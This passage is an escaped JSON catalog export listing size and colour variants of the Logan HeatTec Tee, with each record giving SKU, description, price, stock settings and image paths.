chafing.<\\/p>\\n<p>&bull; Semi-fitted. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/tumble dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"logan-heattec-reg-tee-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},\"532\":{\"sku\":\"MS10-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Logan  HeatTec&reg; Tee-S-Blue\",\"description\":\"<p>Soft and lightweight, the Logan HeatTec&reg; Tee gets you through the long haul in total comfort. It boasts superior sweat-wicking performance to keep skin dry and cool, and strategic flat-lock seams to resist chafing.<\\/p>\\n<p>&bull; Semi-fitted. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/tumble dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"logan-heattec-reg-tee-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms10-blue_alt1.jpg,\\/m\\/s\\/ms10-blue_back.jpg\",\"image\":\"\\/m\\/s\\/ms10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms10-blue_alt1.jpg,\\/m\\/s\\/ms10-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"533\":{\"sku\":\"MS10-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Logan  HeatTec&reg; Tee-S-Red\",\"description\":\"<p>Soft and lightweight, the Logan HeatTec&reg; Tee gets you through the long haul in total comfort. It boasts superior sweat-wicking performance to keep skin dry and cool, and strategic flat-lock seams to resist chafing.<\\/p>\\n<p>&bull; Semi-fitted. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/tumble dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"logan-heattec-reg-tee-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms10-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms10-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms10-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms10-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms10-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"534\":{\"sku\":\"MS10-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Logan  HeatTec&reg; Tee-M-Black\",\"description\":\"<p>Soft and lightweight, the Logan HeatTec&reg; Tee gets you through the long haul in total comfort. It boasts superior sweat-wicking performance to keep skin dry and cool, and strategic flat-lock seams to resist chafing.<\\/p>\\n<p>&bull; Semi-fitted. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/tumble dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"logan-heattec-reg-tee-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"535\":{\"sku\":\"MS10-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Logan  HeatTec&reg; Tee-M-Blue\",\"description\":\"<p>Soft and lightweight, the Logan HeatTec&reg; Tee gets you through the long haul in total comfort. It boasts superior sweat-wicking performance to keep skin dry and cool, and strategic flat-lock seams to resist chafing.<\\/p>\\n<p>&bull; Semi-fitted. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/tumble dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"logan-heattec-reg-tee-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms10-blue_alt1.jpg,\\/m\\/s\\/ms10-blue_back.jpg\",\"image\":\"\\/m\\/s\\/ms10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms10-blue_alt1.jpg,\\/m\\/s\\/ms10-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"536\":{\"sku\":\"MS10-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Logan  HeatTec&reg; Tee-M-Red\",\"description\":\"<p>Soft and lightweight, the Logan HeatTec&reg; Tee gets you through the long haul in total comfort. It boasts superior sweat-wicking performance to keep skin dry and cool, and strategic flat-lock seams to resist chafing.<\\/p>\\n<p>&bull; Semi-fitted. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/tumble dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"logan-heattec-reg-tee-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms10-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms10-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms10-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms10-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms10-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"537\":{\"sku\":\"MS10-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Logan  HeatTec&reg; Tee-L-Black\",\"description\":\"<p>Soft and lightweight, the Logan HeatTec&reg; Tee gets you through the long haul in total comfort. It boasts superior sweat-wicking performance to keep skin dry and cool, and strategic flat-lock seams to resist chafing.<\\/p>\\n<p>&bull; Semi-fitted. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/tumble dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"logan-heattec-reg-tee-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"538\":{\"sku\":\"MS10-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Logan  HeatTec&reg; Tee-L-Blue\",\"description\":\"<p>Soft and lightweight, the Logan HeatTec&reg; Tee gets you through the long haul in total comfort. It boasts superior sweat-wicking performance to keep skin dry and cool, and strategic flat-lock seams to resist chafing.<\\/p>\\n<p>&bull; Semi-fitted. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/tumble dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"logan-heattec-reg-tee-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms10-blue_alt1.jpg,\\/m\\/s\\/ms10-blue_back.jpg\",\"image\":\"\\/m\\/s\\/ms10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms10-blue_alt1.jpg,\\/m\\/s\\/ms10-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"539\":{\"sku\":\"MS10-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Logan  HeatTec&reg; Tee-L-Red\",\"description\":\"<p>Soft and lightweight, the Logan HeatTec&reg; Tee gets you through the long haul in total comfort. It boasts superior sweat-wicking performance to keep skin dry and cool, and strategic flat-lock seams to resist chafing.<\\/p>\\n<p>&bull; Semi-fitted. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/tumble dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"logan-heattec-reg-tee-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms10-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms10-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms10-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms10-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms10-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"540\":{\"sku\":\"MS10-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Logan  HeatTec&reg; Tee-XL-Black\",\"description\":\"<p>Soft and lightweight, the Logan HeatTec&reg; Tee gets you through the long haul in total comfort. It boasts superior sweat-wicking performance to keep skin dry and cool, and strategic flat-lock seams to resist chafing.<\\/p>\\n<p>&bull; Semi-fitted. <br \\/>&bull; Crew neckline. <br \\/>&bull; Machine wash\\/tumble dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 